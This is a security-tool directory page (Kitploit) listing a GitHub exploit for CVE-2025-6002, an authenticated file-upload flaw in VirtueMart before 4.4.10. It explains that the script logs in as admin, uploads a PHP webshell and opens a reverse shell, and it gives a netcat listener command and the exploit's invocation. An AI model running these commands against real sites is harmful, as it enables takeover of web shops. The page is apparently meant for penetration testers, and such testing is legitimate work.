Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-6002 | Kitploit
Tools/GitHubGitHub/schn1tzelme1ster/cve-2025-6002
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration Testing
GitHubschn1tzelme1ster/cve-2025-6002

CVE-2025-6002

View Repository
4 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Exploit for CVE-2025-6002

This script exploits the authenticated arbitrary file upload vulnerability in VirtueMart < 4.4.10 (CVE-2025-6002), which is described in this blog post: https://blog.blacklanternsecurity.com/p/doomla-zero-days

This script logs in to VirtueMart with the given credentials, creates a new product and uploads a PHP webshell as a media file. It then invokes a reverse shell to the provided IP/port.

Parameters:

  • --url: The VirtueMart url
  • --username: admin username
  • --password: admin password
  • --remote-ip: attacker ip addresshttps://github.com/schn1tzelme1ster/CVE-2025-6002/tree/main
  • --remote-port: attacker port

Usage:

  1. Run Netcat on the attacker machine:
root@kitploit:~
nc -nlvp 1337
  1. Execute the exploit
root@kitploit:~
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337
Download Tool